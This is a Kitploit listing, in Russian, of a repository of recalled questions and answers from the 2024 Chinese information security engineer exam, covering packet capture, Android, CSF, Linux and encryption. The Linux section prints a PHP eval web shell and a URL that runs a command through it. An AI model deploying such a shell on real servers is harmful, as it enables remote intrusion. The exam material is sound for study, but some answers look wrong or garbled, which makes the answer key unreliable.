Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
2024InformationSecurityEngineer — 2024年信息安全工程师、2024InformationSecurityEngineer | Kitploit
Инструменты/GitHubGitHub/jas502n/2024informationsecurityengineer
Android SecurityEncryption/Decryption ToolsNetwork SecurityLearning & EducationCurated ResourcesLearning Paths & CoursesLabs & Practice
GitHubjas502n/2024informationsecurityengineer

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

2024InformationSecurityEngineer

2024年信息安全工程师、2024InformationSecurityEngineer

Репозиторий
11 год назадЕщё не проверено

2024InformationSecurityEngineer

Инженер по информационной безопасности 2024, 2024InformationSecurityEngineer

Вторая половина 2024 года - Инженер по информационной безопасности

Примеры заданий (по воспоминаниям)

Время экзамена (软考) : 2024年11月08日

1. Захват пакетов межсетевого экрана (14 баллов)

  1. Длина пакета ___ (2 балла) Ответ: 63
  2. Реальное устройство или виртуальная машина ___ (2 балла) Ответ: виртуальная машина
  3. IP-адрес и порт управляющего хоста ___ (2 балла) Ответ: 192.168.1.218 14444
  4. Правило фильтрации Wireshark по IP и порту ___ (2 балла) Ответ: ip.addr == 192.168.2.105 and tcp.dstport == 14444
  5. Команда, используемая управляющим хостом (2 балла) Ответ: ipconfig
  6. Сочетание клавиш в Windows для просмотра межсетевого экрана ___ (2 балла) Ответ: firewall.cpl
  7. Какой параметр ___ (2 балла) Ответ: настраиваемый

2. Вопросы по Android (16 баллов)

  1. Каталог/файл хранения подписи ___ (2 балла) Ответ: META-INF

  2. Каталог/файл хранения разрешений ___ (2 балла) Ответ: AndroidManifest.xml

  3. Вопрос 5 (10 баллов) (1) Какая настройка поддерживает резервное копирование; (2) Можно ли читать исторические данные о местоположении, есть ли угрозы безопасности; (3) Какие из четырёх основных компонентов используются в конфигурационном файле; (4) Какой компонент имеет самый высокий риск утечки информации; (5) Имеет ли место злоупотребление информацией? Подробно объясните;

    Ответ: (1) backup...... не поддерживает резервное копирование (2) Существует угроза: есть риск утечки неизвестной информации (3) Activity, BroadcastRecevier (4) Contentprovider (5) Имеет место злоупотребление информацией: разрешения на местоположение, камеру, хранилище, контакты, мультимедиа, Bluetooth и другие — многие из них являются чрезмерным сбором.

  4. Имеет ли пользователь root-права в Android (2 балла) Ответ: нет

3. CSF (11 баллов)

  1. Какая модель безопасности ___ (2 балла) Ответ: PDRR
  2. Неизвестно
  3. Какова основная функция межсетевого экрана ___ (2 балла) Ответ: защита
  4. Вопрос 2 (4 балла) (1) Какую дополнительную основную функцию CSF имеет по сравнению с PDRR ___ (2 балла) Ответ: идентификация (2) К какой функции CSF относится оценка рисков ___ (2 балла) Ответ: идентификация
  5. Помимо идентификации активов, какие ещё три вида идентификации существуют ___ (3 балла) Ответ: идентификация рисков; идентификация уязвимостей; идентификация существующих мер безопасности

4. Linux (13 баллов)

  1. Полная форма команды ll ___ (2 балла) Ответ: ls -l
  2. Сейчас root или обычный пользователь ___ (2 балла) Ответ: root
  3. Числовое выражение прав доступа к файлу ___ (2 балла) Ответ: rw-r--r-- 644
  4. Что означает ../ на рисунке ___ (2 балла) Ответ: родительский каталог, /var/www/html
  5. Встроенные в Linux команды для вычисления хеш-значений ___ (2 балла) md5sum; sha1sum; shasum -a 256
  6. shell.php <?php @eval($_GET["cmd"]); ?> (5 баллов)
  1. Какой пароль подключения соответствует этому файлу Ответ: cmd
  2. Какой HTTP-метод запроса используется Ответ: GET
  3. Предположим, домен abc.com, полный URL-адрес для выполнения whoami Ответ: abc.com/shell.php?cmd=system("whoami")

5. Шифрование (15 баллов)

  1. Помимо симметричного и асимметричного, как ещё можно шифровать в зависимости от способа обработки открытого текста (2 балла) Ответ: блочное шифрование и поточное шифрование
  2. 8-битное представление a (2 балла) Ответ: 97 ---》 01100001
  3. Результат XOR-шифрования a и abc (6 баллов) Ответ: 032 или 00000000 00000011 00000010
  4. Даны mi, ki, ci, как получить формулу открытого текста (2 балла) Ответ: mi = ki XOR ^ ci
  5. Безопасно ли шифровать два разных открытых текста одним и тем же ключом потокового шифра? Почему? (2 балла) Ответ: небезопасно, из одного открытого текста можно вывести другой
  6. Можно ли использовать блочный шифр в качестве потокового? (1 балл) Ответ: можно
Скачать инструмент